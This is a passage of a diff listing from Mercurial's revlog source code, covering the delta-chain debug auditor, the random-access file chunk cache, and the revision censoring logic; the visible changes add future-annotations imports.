680 682 for entry in revlog_entries:
681 683 if not changelog and entry.is_changelog:
682 684 continue
683 685 elif not manifest and entry.is_manifestlog:
684 686 continue
685 687 elif not filelogs and entry.is_filelog:
686 688 continue
687 689 rlog = entry.get_revlog_instance(repo).get_revlog()
688 690 fm.startitem()
689 691 nb_rev = len(rlog)
690 692 inline = rlog._inline
691 693 data_size = rlog._get_data_offset(nb_rev - 1)
692 694
693 695 target = rlog.target
694 696 revlog_type = b'unknown'
695 697 revlog_target = b''
696 698 if target[0] == constants.KIND_CHANGELOG:
697 699 revlog_type = b'changelog'
698 700 elif target[0] == constants.KIND_MANIFESTLOG:
699 701 revlog_type = b'manifest'
700 702 revlog_target = target[1]
701 703 elif target[0] == constants.KIND_FILELOG:
702 704 revlog_type = b'file'
703 705 revlog_target = target[1]
704 706
705 707 fm.write(b'revlog.rev-count', b'%9d', nb_rev)
706 708 fm.write(b'revlog.data-size', b'%12d', data_size)
707 709
708 710 fm.write(b'revlog.inline', b' %-3s', b'yes' if inline else b'no')
709 711 fm.write(b'revlog.type', b' %-9s', revlog_type)
710 712 fm.write(b'revlog.target', b' %s', revlog_target)
711 713
712 714 fm.plain(b'\n')
713 715
714 716
715 717 class DeltaChainAuditor:
716 718 def __init__(self, revlog):
717 719 self._revlog = revlog
718 720 self._index = self._revlog.index
719 721 self._generaldelta = revlog.delta_config.general_delta
720 722 self._chain_size_cache = {}
721 723 # security to avoid crash on corrupted revlogs
722 724 self._total_revs = len(self._index)
723 725
724 726 def revinfo(self, rev, size_info=True, dist_info=True, sparse_info=True):
725 727 e = self._index[rev]
726 728 compsize = e[constants.ENTRY_DATA_COMPRESSED_LENGTH]
727 729 uncompsize = e[constants.ENTRY_DATA_UNCOMPRESSED_LENGTH]
728 730
729 731 base = e[constants.ENTRY_DELTA_BASE]
730 732 p1 = e[constants.ENTRY_PARENT_1]
731 733 p2 = e[constants.ENTRY_PARENT_2]
732 734
733 735 # If the parents of a revision has an empty delta, we never try to
734 736 # delta against that parent, but directly against the delta base of
735 737 # that parent (recursively). It avoids adding a useless entry in the
736 738 # chain.
737 739 #
738 740 # However we need to detect that as a special case for delta-type, that
739 741 # is not simply "other".
740 742 p1_base = p1
741 743 if p1 != nodemod.nullrev and p1 < self._total_revs:
742 744 e1 = self._index[p1]
743 745 while e1[constants.ENTRY_DATA_COMPRESSED_LENGTH] == 0:
744 746 new_base = e1[constants.ENTRY_DELTA_BASE]
745 747 if (
746 748 new_base == p1_base
747 749 or new_base == nodemod.nullrev
748 750 or new_base >= self._total_revs
749 751 ):
750 752 break
751 753 p1_base = new_base
752 754 e1 = self._index[p1_base]
753 755 p2_base = p2
754 756 if p2 != nodemod.nullrev and p2 < self._total_revs:
755 757 e2 = self._index[p2]
756 758 while e2[constants.ENTRY_DATA_COMPRESSED_LENGTH] == 0:
757 759 new_base = e2[constants.ENTRY_DELTA_BASE]
758 760 if (
759 761 new_base == p2_base
760 762 or new_base == nodemod.nullrev
761 763 or new_base >= self._total_revs
762 764 ):
763 765 break
764 766 p2_base = new_base
765 767 e2 = self._index[p2_base]
766 768
767 769 if self._generaldelta:
768 770 if base == p1:
769 771 deltatype = b'p1'
770 772 elif base == p2:
771 773 deltatype = b'p2'
772 774 elif base == rev:
773 775 deltatype = b'base'
774 776 elif base == p1_base:
775 777 deltatype = b'skip1'
776 778 elif base == p2_base:
777 779 deltatype = b'skip2'
778 780 elif self._revlog.issnapshot(rev):
779 781 deltatype = b'snap'
780 782 elif base == rev - 1:
781 783 deltatype = b'prev'
782 784 else:
783 785 deltatype = b'other'
784 786 else:
785 787 if base == rev:
786 788 deltatype = b'base'
787 789 else:
788 790 deltatype = b'prev'
789 791
790 792 chain = self._revlog._deltachain(rev)[0]
791 793
792 794 data = {
793 795 'p1': p1,
794 796 'p2': p2,
795 797 'compressed_size': compsize,
796 798 'uncompressed_size': uncompsize,
797 799 'deltatype': deltatype,
798 800 'chain': chain,
799 801 }
800 802
801 803 if size_info or dist_info or sparse_info:
802 804 chain_size = 0
803 805 for iter_rev in reversed(chain):
804 806 cached = self._chain_size_cache.get(iter_rev)
805 807 if cached is not None:
806 808 chain_size += cached
807 809 break
808 810 e = self._index[iter_rev]
809 811 chain_size += e[constants.ENTRY_DATA_COMPRESSED_LENGTH]
810 812 self._chain_size_cache[rev] = chain_size
811 813 data['chain_size'] = chain_size
812 814
813 815 return data
814 816
815 817
816 818 def debug_delta_chain(
817 819 revlog,
818 820 revs=None,
819 821 size_info=True,
820 822 dist_info=True,
821 823 sparse_info=True,
822 824 ):
823 825 auditor = DeltaChainAuditor(revlog)
824 826 r = revlog
825 827 start = r.start
826 828 length = r.length
827 829 withsparseread = revlog.data_config.with_sparse_read
828 830
829 831 header = (
830 832 b' rev'
831 833 b' p1'
832 834 b' p2'
833 835 b' chain#'
834 836 b' chainlen'
835 837 b' prev'
836 838 b' delta'
837 839 )
838 840 if size_info:
839 841 header += b' size' b' rawsize' b' chainsize' b' ratio'
840 842 if dist_info:
841 843 header += b' lindist' b' extradist' b' extraratio'
842 844 if withsparseread and sparse_info:
843 845 header += b' readsize' b' largestblk' b' rddensity' b' srchunks'
844 846 header += b'\n'
845 847 yield header
846 848
847 849 if revs is None:
848 850 all_revs = iter(r)
849 851 else:
850 852 revlog_size = len(r)
851 853 all_revs = sorted(rev for rev in revs if rev < revlog_size)
852 854
853 855 chainbases = {}
854 856 for rev in all_revs:
855 857 info = auditor.revinfo(
856 858 rev,
857 859 size_info=size_info,
858 860 dist_info=dist_info,
859 861 sparse_info=sparse_info,
860 862 )
861 863 comp = info['compressed_size']
862 864 uncomp = info['uncompressed_size']
863 865 chain = info['chain']
864 866 chainbase = chain[0]
865 867 chainid = chainbases.setdefault(chainbase, len(chainbases) + 1)
866 868 if dist_info:
867 869 basestart = start(chainbase)
868 870 revstart = start(rev)
869 871 lineardist = revstart + comp - basestart
870 872 extradist = lineardist - info['chain_size']
871 873 try:
872 874 prevrev = chain[-2]
873 875 except IndexError:
874 876 prevrev = -1
875 877
876 878 if size_info:
877 879 chainsize = info['chain_size']
878 880 if uncomp != 0:
879 881 chainratio = float(chainsize) / float(uncomp)
880 882 else:
881 883 chainratio = chainsize
882 884
883 885 if dist_info:
884 886 if chainsize != 0:
885 887 extraratio = float(extradist) / float(chainsize)
886 888 else:
887 889 extraratio = extradist
888 890
889 891 # label, display-format, data-key, value
890 892 entry = [
891 893 (b'rev', b'%7d', 'rev', rev),
892 894 (b'p1', b'%7d', 'p1', info['p1']),
893 895 (b'p2', b'%7d', 'p2', info['p2']),
894 896 (b'chainid', b'%7d', 'chainid', chainid),
895 897 (b'chainlen', b'%8d', 'chainlen', len(chain)),
896 898 (b'prevrev', b'%8d', 'prevrev', prevrev),
897 899 (b'deltatype', b'%7s', 'deltatype', info['deltatype']),
898 900 ]
899 901 if size_info:
900 902 entry.extend(
901 903 [
902 904 (b'compsize', b'%10d', 'compsize', comp),
903 905 (b'uncompsize', b'%10d', 'uncompsize', uncomp),
904 906 (b'chainsize', b'%10d', 'chainsize', chainsize),
905 907 (b'chainratio', b'%9.5f', 'chainratio', chainratio),
906 908 ]
907 909 )
908 910 if dist_info:
909 911 entry.extend(
910 912 [
911 913 (b'lindist', b'%9d', 'lindist', lineardist),
912 914 (b'extradist', b'%9d', 'extradist', extradist),
913 915 (b'extraratio', b'%10.5f', 'extraratio', extraratio),
914 916 ]
915 917 )
916 918 if withsparseread and sparse_info:
917 919 chainsize = info['chain_size']
918 920 readsize = 0
919 921 largestblock = 0
920 922 srchunks = 0
921 923
922 924 for revschunk in deltautil.slicechunk(r, chain):
923 925 srchunks += 1
924 926 blkend = start(revschunk[-1]) + length(revschunk[-1])
925 927 blksize = blkend - start(revschunk[0])
926 928
927 929 readsize += blksize
928 930 if largestblock < blksize:
929 931 largestblock = blksize
930 932
931 933 if readsize:
932 934 readdensity = float(chainsize) / float(readsize)
933 935 else:
934 936 readdensity = 1
935 937 entry.extend(
936 938 [
937 939 (b'readsize', b'%10d', 'readsize', readsize),
938 940 (b'largestblock', b'%10d', 'largestblock', largestblock),
939 941 (b'readdensity', b'%9.5f', 'readdensity', readdensity),
940 942 (b'srchunks', b'%8d', 'srchunks', srchunks),
941 943 ]
942 944 )
943 945 yield entry
@@ -1,230 +1,232
1 1 # Copyright Mercurial Contributors
2 2 #
3 3 # This software may be used and distributed according to the terms of the
4 4 # GNU General Public License version 2 or any later version.
5 5
6 from __future__ import annotations
7
6 8 import contextlib
7 9
8 10 from ..i18n import _
9 11 from .. import (
10 12 error,
11 13 util,
12 14 )
13 15
14 16
15 17 _MAX_CACHED_CHUNK_SIZE = 1048576 # 1 MiB
16 18
17 19 PARTIAL_READ_MSG = _(
18 20 b'partial read of revlog %s; expected %d bytes from offset %d, got %d'
19 21 )
20 22
21 23
22 24 def _is_power_of_two(n):
23 25 return (n & (n - 1) == 0) and n != 0
24 26
25 27
26 28 class appender:
27 29 """the changelog index must be updated last on disk, so we use this class
28 30 to delay writes to it"""
29 31
30 32 def __init__(self, vfs, name, mode, buf):
31 33 self.data = buf
32 34 fp = vfs(name, mode)
33 35 self.fp = fp
34 36 self.offset = fp.tell()
35 37 self.size = vfs.fstat(fp).st_size
36 38 self._end = self.size
37 39
38 40 def end(self):
39 41 return self._end
40 42
41 43 def tell(self):
42 44 return self.offset
43 45
44 46 def flush(self):
45 47 pass
46 48
47 49 @property
48 50 def closed(self):
49 51 return self.fp.closed
50 52
51 53 def close(self):
52 54 self.fp.close()
53 55
54 56 def seek(self, offset, whence=0):
55 57 '''virtual file offset spans real file and data'''
56 58 if whence == 0:
57 59 self.offset = offset
58 60 elif whence == 1:
59 61 self.offset += offset
60 62 elif whence == 2:
61 63 self.offset = self.end() + offset
62 64 if self.offset < self.size:
63 65 self.fp.seek(self.offset)
64 66
65 67 def read(self, count=-1):
66 68 '''only trick here is reads that span real file and data'''
67 69 ret = b""
68 70 if self.offset < self.size:
69 71 s = self.fp.read(count)
70 72 ret = s
71 73 self.offset += len(s)
72 74 if count > 0:
73 75 count -= len(s)
74 76 if count != 0:
75 77 doff = self.offset - self.size
76 78 self.data.insert(0, b"".join(self.data))
77 79 del self.data[1:]
78 80 s = self.data[0][doff : doff + count]
79 81 self.offset += len(s)
80 82 ret += s
81 83 return ret
82 84
83 85 def write(self, s):
84 86 self.data.append(bytes(s))
85 87 self.offset += len(s)
86 88 self._end += len(s)
87 89
88 90 def __enter__(self):
89 91 self.fp.__enter__()
90 92 return self
91 93
92 94 def __exit__(self, *args):
93 95 return self.fp.__exit__(*args)
94 96
95 97
96 98 class randomaccessfile:
97 99 """Accessing arbitrary chuncks of data within a file, with some caching"""
98 100
99 101 def __init__(
100 102 self,
101 103 opener,
102 104 filename,
103 105 default_cached_chunk_size,
104 106 initial_cache=None,
105 107 ):
106 108 # Required by bitwise manipulation below
107 109 assert _is_power_of_two(default_cached_chunk_size)
108 110
109 111 self.opener = opener
110 112 self.filename = filename
111 113 self.default_cached_chunk_size = default_cached_chunk_size
112 114 self.writing_handle = None # This is set from revlog.py
113 115 self.reading_handle = None
114 116 self._cached_chunk = b''
115 117 self._cached_chunk_position = 0 # Offset from the start of the file
116 118 if initial_cache:
117 119 self._cached_chunk_position, self._cached_chunk = initial_cache
118 120
119 121 def clear_cache(self):
120 122 self._cached_chunk = b''
121 123 self._cached_chunk_position = 0
122 124
123 125 @property
124 126 def is_open(self):
125 127 """True if any file handle is being held
126 128
127 129 Used for assert and debug in the python code"""
128 130 return (
129 131 self.reading_handle is not None or self.writing_handle is not None
130 132 )
131 133
132 134 def _open(self, mode=b'r'):
133 135 """Return a file object"""
134 136 return self.opener(self.filename, mode=mode)
135 137
136 138 @contextlib.contextmanager
137 139 def _read_handle(self):
138 140 """File object suitable for reading data"""
139 141 # Use a file handle being actively used for writes, if available.
140 142 # There is some danger to doing this because reads will seek the
141 143 # file. However, revlog._writeentry performs a SEEK_END before all
142 144 # writes, so we should be safe.
143 145 if self.writing_handle:
144 146 yield self.writing_handle
145 147
146 148 elif self.reading_handle:
147 149 yield self.reading_handle
148 150
149 151 # Otherwise open a new file handle.
150 152 else:
151 153 with self._open() as fp:
152 154 yield fp
153 155
154 156 @contextlib.contextmanager
155 157 def reading(self):
156 158 """Context manager that keeps the file open for reading"""
157 159 if (
158 160 self.reading_handle is None
159 161 and self.writing_handle is None
160 162 and self.filename is not None
161 163 ):
162 164 with self._open() as fp:
163 165 self.reading_handle = fp
164 166 try:
165 167 yield
166 168 finally:
167 169 self.reading_handle = None
168 170 else:
169 171 yield
170 172
171 173 def read_chunk(self, offset, length):
172 174 """Read a chunk of bytes from the file.
173 175
174 176 Accepts an absolute offset, length to read.
175 177
176 178 Returns a str or buffer of raw byte data.
177 179
178 180 Raises if the requested number of bytes could not be read.
179 181 """
180 182 end = offset + length
181 183 cache_start = self._cached_chunk_position
182 184 cache_end = cache_start + len(self._cached_chunk)
183 185 # Is the requested chunk within the cache?
184 186 if cache_start <= offset and end <= cache_end:
185 187 if cache_start == offset and end == cache_end:
186 188 return self._cached_chunk # avoid a copy
187 189 relative_start = offset - cache_start
188 190 return util.buffer(self._cached_chunk, relative_start, length)
189 191
190 192 return self._read_and_update_cache(offset, length)
191 193
192 194 def _read_and_update_cache(self, offset, length):
193 195 # Cache data both forward and backward around the requested
194 196 # data, in a fixed size window. This helps speed up operations
195 197 # involving reading the revlog backwards.
196 198 real_offset = offset & ~(self.default_cached_chunk_size - 1)
197 199 real_length = (
198 200 (offset + length + self.default_cached_chunk_size)
199 201 & ~(self.default_cached_chunk_size - 1)
200 202 ) - real_offset
201 203 with self._read_handle() as file_obj:
202 204 file_obj.seek(real_offset)
203 205 data = file_obj.read(real_length)
204 206
205 207 self._add_cached_chunk(real_offset, data)
206 208
207 209 relative_offset = offset - real_offset
208 210 got = len(data) - relative_offset
209 211 if got < length:
210 212 message = PARTIAL_READ_MSG % (self.filename, length, offset, got)
211 213 raise error.RevlogError(message)
212 214
213 215 if offset != real_offset or real_length != length:
214 216 return util.buffer(data, relative_offset, length)
215 217 return data
216 218
217 219 def _add_cached_chunk(self, offset, data):
218 220 """Add to or replace the cached data chunk.
219 221
220 222 Accepts an absolute offset and the data that is at that location.
221 223 """
222 224 if (
223 225 self._cached_chunk_position + len(self._cached_chunk) == offset
224 226 and len(self._cached_chunk) + len(data) < _MAX_CACHED_CHUNK_SIZE
225 227 ):
226 228 # add to existing cache
227 229 self._cached_chunk += data
228 230 else:
229 231 self._cached_chunk = data
230 232 self._cached_chunk_position = offset
@@ -1,883 +1,885
1 1 # censor code related to censoring revision
2 2 # coding: utf8
3 3 #
4 4 # Copyright 2021 Pierre-Yves David <pierre-yves.david@octobus.net>
5 5 # Copyright 2015 Google, Inc <martinvonz@google.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 from __future__ import annotations
11
10 12 import binascii
11 13 import contextlib
12 14 import os
13 15 import struct
14 16
15 17 from ..node import (
16 18 nullrev,
17 19 )
18 20 from .constants import (
19 21 COMP_MODE_PLAIN,
20 22 ENTRY_DATA_COMPRESSED_LENGTH,
21 23 ENTRY_DATA_COMPRESSION_MODE,
22 24 ENTRY_DATA_OFFSET,
23 25 ENTRY_DATA_UNCOMPRESSED_LENGTH,
24 26 ENTRY_DELTA_BASE,
25 27 ENTRY_LINK_REV,
26 28 ENTRY_NODE_ID,
27 29 ENTRY_PARENT_1,
28 30 ENTRY_PARENT_2,
29 31 ENTRY_SIDEDATA_COMPRESSED_LENGTH,
30 32 ENTRY_SIDEDATA_COMPRESSION_MODE,
31 33 ENTRY_SIDEDATA_OFFSET,
32 34 REVIDX_ISCENSORED,
33 35 REVLOGV0,
34 36 REVLOGV1,
35 37 )
36 38 from ..i18n import _
37 39
38 40 from .. import (
39 41 error,
40 42 mdiff,
41 43 pycompat,
42 44 revlogutils,
43 45 util,
44 46 )
45 47 from ..utils import (
46 48 storageutil,
47 49 )
48 50 from . import (
49 51 constants,
50 52 deltas,
51 53 )
52 54
53 55
54 56 def v1_censor(rl, tr, censor_nodes, tombstone=b''):
55 57 """censors a revision in a "version 1" revlog"""
56 58 assert rl._format_version == constants.REVLOGV1, rl._format_version
57 59
58 60 # avoid cycle
59 61 from .. import revlog
60 62
61 63 censor_revs = set(rl.rev(node) for node in censor_nodes)
62 64 tombstone = storageutil.packmeta({b'censored': tombstone}, b'')
63 65
64 66 # Rewriting the revlog in place is hard. Our strategy for censoring is
65 67 # to create a new revlog, copy all revisions to it, then replace the
66 68 # revlogs on transaction close.
67 69 #
68 70 # This is a bit dangerous. We could easily have a mismatch of state.
69 71 newrl = revlog.revlog(
70 72 rl.opener,
71 73 target=rl.target,
72 74 radix=rl.radix,
73 75 postfix=b'tmpcensored',
74 76 censorable=True,
75 77 data_config=rl.data_config,
76 78 delta_config=rl.delta_config,
77 79 feature_config=rl.feature_config,
78 80 may_inline=rl._inline,
79 81 )
80 82 # inline splitting will prepare some transaction work that will get
81 83 # confused by the final file move. So if there is a risk of not being
82 84 # inline at the end, we prevent the new revlog to be inline in the first
83 85 # place.
84 86 assert not (newrl._inline and not rl._inline)
85 87
86 88 for rev in rl.revs():
87 89 node = rl.node(rev)
88 90 p1, p2 = rl.parents(node)
89 91
90 92 if rev in censor_revs:
91 93 newrl.addrawrevision(
92 94 tombstone,
93 95 tr,
94 96 rl.linkrev(rev),
95 97 p1,
96 98 p2,
97 99 node,
98 100 constants.REVIDX_ISCENSORED,
99 101 )
100 102
101 103 if newrl.deltaparent(rev) != nullrev:
102 104 m = _(b'censored revision stored as delta; cannot censor')
103 105 h = _(
104 106 b'censoring of revlogs is not fully implemented;'
105 107 b' please report this bug'
106 108 )
107 109 raise error.Abort(m, hint=h)
108 110 continue
109 111
110 112 if rl.iscensored(rev):
111 113 if rl.deltaparent(rev) != nullrev:
112 114 m = _(
113 115 b'cannot censor due to censored '
114 116 b'revision having delta stored'
115 117 )
116 118 raise error.Abort(m)
117 119 rawtext = rl._inner._chunk(rev)
118 120 else:
119 121 rawtext = rl.rawdata(rev)
120 122
121 123 newrl.addrawrevision(
122 124 rawtext, tr, rl.linkrev(rev), p1, p2, node, rl.flags(rev)
123 125 )
124 126
125 127 tr.addbackup(rl._indexfile, location=b'store')
126 128 if not rl._inline:
127 129 tr.addbackup(rl._datafile, location=b'store')
128 130
129 131 rl.opener.rename(newrl._indexfile, rl._indexfile)
130 132 if newrl._inline:
131 133 assert rl._inline
132 134 else:
133 135 assert not rl._inline
134 136 rl.opener.rename(newrl._datafile, rl._datafile)
135 137
136 138 rl.clearcaches()
137 139 chunk_cache = rl._loadindex()
138 140 rl._load_inner(chunk_cache)
139 141
140 142
141 143 def v2_censor(revlog, tr, censor_nodes, tombstone=b''):
142 144 """censors a revision in a "version 2" revlog"""
143 145 assert revlog._format_version != REVLOGV0, revlog._format_version
144 146 assert revlog._format_version != REVLOGV1, revlog._format_version
145 147
146 148 censor_revs = {revlog.rev(node) for node in censor_nodes}
147 149 _rewrite_v2(revlog, tr, censor_revs, tombstone)
148 150
149 151
150 152 def _rewrite_v2(revlog, tr, censor_revs, tombstone=b''):
151 153 """rewrite a revlog to censor some of its content
152 154
153 155 General principle
154 156
155 157 We create new revlog files (index/data/sidedata) to copy the content of
156 158 the existing data without the censored data.
157 159
158 160 We need to recompute new delta for any revision that used the censored
159 161 revision as delta base. As the cumulative size of the new delta may be
160 162 large, we store them in a temporary file until they are stored in their
161 163 final destination.
162 164
163 165 All data before the censored data can be blindly copied. The rest needs
164 166 to be copied as we go and the associated index entry needs adjustement.
165 167 """
166 168 assert revlog._format_version != REVLOGV0, revlog._format_version
167 169 assert revlog._format_version != REVLOGV1, revlog._format_version
168 170
169 171 old_index = revlog.index
170 172 docket = revlog._docket
171 173
172 174 tombstone = storageutil.packmeta({b'censored': tombstone}, b'')
173 175
174 176 first_excl_rev = min(censor_revs)
175 177
176 178 first_excl_entry = revlog.index[first_excl_rev]
177 179 index_cutoff = revlog.index.entry_size * first_excl_rev
178 180 data_cutoff = first_excl_entry[ENTRY_DATA_OFFSET] >> 16
179 181 sidedata_cutoff = revlog.sidedata_cut_off(first_excl_rev)
180 182
181 183 with pycompat.unnamedtempfile(mode=b"w+b") as tmp_storage:
182 184 # rev β†’ (new_base, data_start, data_end, compression_mode)
183 185 rewritten_entries = _precompute_rewritten_delta(
184 186 revlog,
185 187 old_index,
186 188 censor_revs,
187 189 tmp_storage,
188 190 )
189 191
190 192 all_files = _setup_new_files(
191 193 revlog,
192 194 index_cutoff,
193 195 data_cutoff,
194 196 sidedata_cutoff,
195 197 )
196 198
197 199 # we dont need to open the old index file since its content already
198 200 # exist in a usable form in `old_index`.
199 201 with all_files() as open_files:
200 202 (
201 203 old_data_file,
202 204 old_sidedata_file,
203 205 new_index_file,
204 206 new_data_file,
205 207 new_sidedata_file,
206 208 ) = open_files
207 209
208 210 # writing the censored revision
209 211
210 212 # Writing all subsequent revisions
211 213 for rev in range(first_excl_rev, len(old_index)):
212 214 if rev in censor_revs:
213 215 _rewrite_censor(
214 216 revlog,
215 217 old_index,
216 218 open_files,
217 219 rev,
218 220 tombstone,
219 221 )
220 222 else:
221 223 _rewrite_simple(
222 224 revlog,
223 225 old_index,
224 226 open_files,
225 227 rev,
226 228 rewritten_entries,
227 229 tmp_storage,
228 230 )
229 231 docket.write(transaction=None, stripping=True)
230 232
231 233
232 234 def _precompute_rewritten_delta(
233 235 revlog,
234 236 old_index,
235 237 excluded_revs,
236 238 tmp_storage,
237 239 ):
238 240 """Compute new delta for revisions whose delta is based on revision that
239 241 will not survive as is.
240 242
241 243 Return a mapping: {rev β†’ (new_base, data_start, data_end, compression_mode)}
242 244 """
243 245 dc = deltas.deltacomputer(revlog)
244 246 rewritten_entries = {}
245 247 first_excl_rev = min(excluded_revs)
246 248 with revlog.reading():
247 249 for rev in range(first_excl_rev, len(old_index)):
248 250 if rev in excluded_revs:
249 251 # this revision will be preserved as is, so we don't need to
250 252 # consider recomputing a delta.
251 253 continue
252 254 entry = old_index[rev]
253 255 if entry[ENTRY_DELTA_BASE] not in excluded_revs:
254 256 continue
255 257 # This is a revision that use the censored revision as the base
256 258 # for its delta. We need a need new deltas
257 259 if entry[ENTRY_DATA_UNCOMPRESSED_LENGTH] == 0:
258 260 # this revision is empty, we can delta against nullrev
259 261 rewritten_entries[rev] = (nullrev, 0, 0, COMP_MODE_PLAIN)
260 262 else:
261 263 text = revlog.rawdata(rev)
262 264 info = revlogutils.revisioninfo(
263 265 node=entry[ENTRY_NODE_ID],
264 266 p1=revlog.node(entry[ENTRY_PARENT_1]),
265 267 p2=revlog.node(entry[ENTRY_PARENT_2]),
266 268 btext=[text],
267 269 textlen=len(text),
268 270 cachedelta=None,
269 271 flags=entry[ENTRY_DATA_OFFSET] & 0xFFFF,
270 272 )
271 273 d = dc.finddeltainfo(
272 274 info, excluded_bases=excluded_revs, target_rev=rev
273 275 )
274 276 default_comp = revlog._docket.default_compression_header
275 277 comp_mode, d = deltas.delta_compression(default_comp, d)
276 278 # using `tell` is a bit lazy, but we are not here for speed
277 279 start = tmp_storage.tell()
278 280 tmp_storage.write(d.data[1])
279 281 end = tmp_storage.tell()
280 282 rewritten_entries[rev] = (d.base, start, end, comp_mode)
281 283 return rewritten_entries
282 284
283 285
284 286 def _setup_new_files(
285 287 revlog,
286 288 index_cutoff,
287 289 data_cutoff,
288 290 sidedata_cutoff,
289 291 ):
290 292 """
291 293
292 294 return a context manager to open all the relevant files:
293 295 - old_data_file,
294 296 - old_sidedata_file,
295 297 - new_index_file,
296 298 - new_data_file,
297 299 - new_sidedata_file,
298 300
299 301 The old_index_file is not here because it is accessed through the
300 302 `old_index` object if the caller function.
301 303 """
302 304 docket = revlog._docket
303 305 old_index_filepath = revlog.opener.join(docket.index_filepath())
304 306 old_data_filepath = revlog.opener.join(docket.data_filepath())
305 307 old_sidedata_filepath = revlog.opener.join(docket.sidedata_filepath())
306 308
307 309 new_index_filepath = revlog.opener.join(docket.new_index_file())
308 310 new_data_filepath = revlog.opener.join(docket.new_data_file())
309 311 new_sidedata_filepath = revlog.opener.join(docket.new_sidedata_file())
310 312
311 313 util.copyfile(old_index_filepath, new_index_filepath, nb_bytes=index_cutoff)
312 314 util.copyfile(old_data_filepath, new_data_filepath, nb_bytes=data_cutoff)
313 315 util.copyfile(
314 316 old_sidedata_filepath,
315 317 new_sidedata_filepath,
316 318 nb_bytes=sidedata_cutoff,
317 319 )
318 320 revlog.opener.register_file(docket.index_filepath())
319 321 revlog.opener.register_file(docket.data_filepath())
320 322 revlog.opener.register_file(docket.sidedata_filepath())
321 323
322 324 docket.index_end = index_cutoff
323 325 docket.data_end = data_cutoff
324 326 docket.sidedata_end = sidedata_cutoff
325 327
326 328 # reload the revlog internal information
327 329 revlog.clearcaches()
328 330 revlog._loadindex(docket=docket)
329 331
330 332 @contextlib.contextmanager
331 333 def all_files_opener():
332 334 # hide opening in an helper function to please check-code, black
333 335 # and various python version at the same time
334 336 with open(old_data_filepath, 'rb') as old_data_file:
335 337 with open(old_sidedata_filepath, 'rb') as old_sidedata_file:
336 338 with open(new_index_filepath, 'r+b') as new_index_file:
337 339 with open(new_data_filepath, 'r+b') as new_data_file:
338 340 with open(
339 341 new_sidedata_filepath, 'r+b'
340 342 ) as new_sidedata_file:
341 343 new_index_file.seek(0, os.SEEK_END)
342 344 assert new_index_file.tell() == index_cutoff
343 345 new_data_file.seek(0, os.SEEK_END)
344 346 assert new_data_file.tell() == data_cutoff
345 347 new_sidedata_file.seek(0, os.SEEK_END)
346 348 assert new_sidedata_file.tell() == sidedata_cutoff
347 349 yield (
348 350 old_data_file,
349 351 old_sidedata_file,
350 352 new_index_file,
351 353 new_data_file,
352 354 new_sidedata_file,
353 355 )
354 356
355 357 return all_files_opener
356 358
357 359
358 360 def _rewrite_simple(
359 361 revlog,
360 362 old_index,
361 363 all_files,
362 364 rev,
363 365 rewritten_entries,
364 366 tmp_storage,
365 367 ):
366 368 """append a normal revision to the index after the rewritten one(s)"""
367 369 (
368 370 old_data_file,
369 371 old_sidedata_file,
370 372 new_index_file,
371 373 new_data_file,
372 374 new_sidedata_file,
373 375 ) = all_files
374 376 entry = old_index[rev]
375 377 flags = entry[ENTRY_DATA_OFFSET] & 0xFFFF
376 378 old_data_offset = entry[ENTRY_DATA_OFFSET] >> 16
377 379
378 380 if rev not in rewritten_entries:
379 381 old_data_file.seek(old_data_offset)
380 382 new_data_size = entry[ENTRY_DATA_COMPRESSED_LENGTH]
381 383 new_data = old_data_file.read(new_data_size)
382 384 data_delta_base = entry[ENTRY_DELTA_BASE]
383 385 d_comp_mode = entry[ENTRY_DATA_COMPRESSION_MODE]
384 386 else:
385 387 (
386 388 data_delta_base,
387 389 start,
388 390 end,
389 391 d_comp_mode,
390 392 ) = rewritten_entries[rev]
391 393 new_data_size = end - start
392 394 tmp_storage.seek(start)
393 395 new_data = tmp_storage.read(new_data_size)
394 396
395 397 # It might be faster to group continuous read/write operation,
396 398 # however, this is censor, an operation that is not focussed
397 399 # around stellar performance. So I have not written this
398 400 # optimisation yet.
399 401 new_data_offset = new_data_file.tell()
400 402 new_data_file.write(new_data)
401 403
402 404 sidedata_size = entry[ENTRY_SIDEDATA_COMPRESSED_LENGTH]
403 405 new_sidedata_offset = new_sidedata_file.tell()
404 406 if 0 < sidedata_size:
405 407 old_sidedata_offset = entry[ENTRY_SIDEDATA_OFFSET]
406 408 old_sidedata_file.seek(old_sidedata_offset)
407 409 new_sidedata = old_sidedata_file.read(sidedata_size)
408 410 new_sidedata_file.write(new_sidedata)
409 411
410 412 data_uncompressed_length = entry[ENTRY_DATA_UNCOMPRESSED_LENGTH]
411 413 sd_com_mode = entry[ENTRY_SIDEDATA_COMPRESSION_MODE]
412 414 assert data_delta_base <= rev, (data_delta_base, rev)
413 415
414 416 new_entry = revlogutils.entry(
415 417 flags=flags,
416 418 data_offset=new_data_offset,
417 419 data_compressed_length=new_data_size,
418 420 data_uncompressed_length=data_uncompressed_length,
419 421 data_delta_base=data_delta_base,
420 422 link_rev=entry[ENTRY_LINK_REV],
421 423 parent_rev_1=entry[ENTRY_PARENT_1],
422 424 parent_rev_2=entry[ENTRY_PARENT_2],
423 425 node_id=entry[ENTRY_NODE_ID],
424 426 sidedata_offset=new_sidedata_offset,
425 427 sidedata_compressed_length=sidedata_size,
426 428 data_compression_mode=d_comp_mode,
427 429 sidedata_compression_mode=sd_com_mode,
428 430 )
429 431 revlog.index.append(new_entry)
430 432 entry_bin = revlog.index.entry_binary(rev)
431 433 new_index_file.write(entry_bin)
432 434
433 435 revlog._docket.index_end = new_index_file.tell()
434 436 revlog._docket.data_end = new_data_file.tell()
435 437 revlog._docket.sidedata_end = new_sidedata_file.tell()
436 438
437 439
438 440 def _rewrite_censor(
439 441 revlog,
440 442 old_index,
441 443 all_files,
442 444 rev,
443 445 tombstone,
444 446 ):
445 447 """rewrite and append a censored revision"""
446 448 (
447 449 old_data_file,
448 450 old_sidedata_file,
449 451 new_index_file,
450 452 new_data_file,
451 453 new_sidedata_file,
452 454 ) = all_files
453 455 entry = old_index[rev]
454 456
455 457 # XXX consider trying the default compression too
456 458 new_data_size = len(tombstone)
457 459 new_data_offset = new_data_file.tell()
458 460 new_data_file.write(tombstone)
459 461
460 462 # we are not adding any sidedata as they might leak info about the censored version
461 463
462 464 link_rev = entry[ENTRY_LINK_REV]
463 465
464 466 p1 = entry[ENTRY_PARENT_1]
465 467 p2 = entry[ENTRY_PARENT_2]
466 468
467 469 new_entry = revlogutils.entry(
468 470 flags=constants.REVIDX_ISCENSORED,
469 471 data_offset=new_data_offset,
470 472 data_compressed_length=new_data_size,
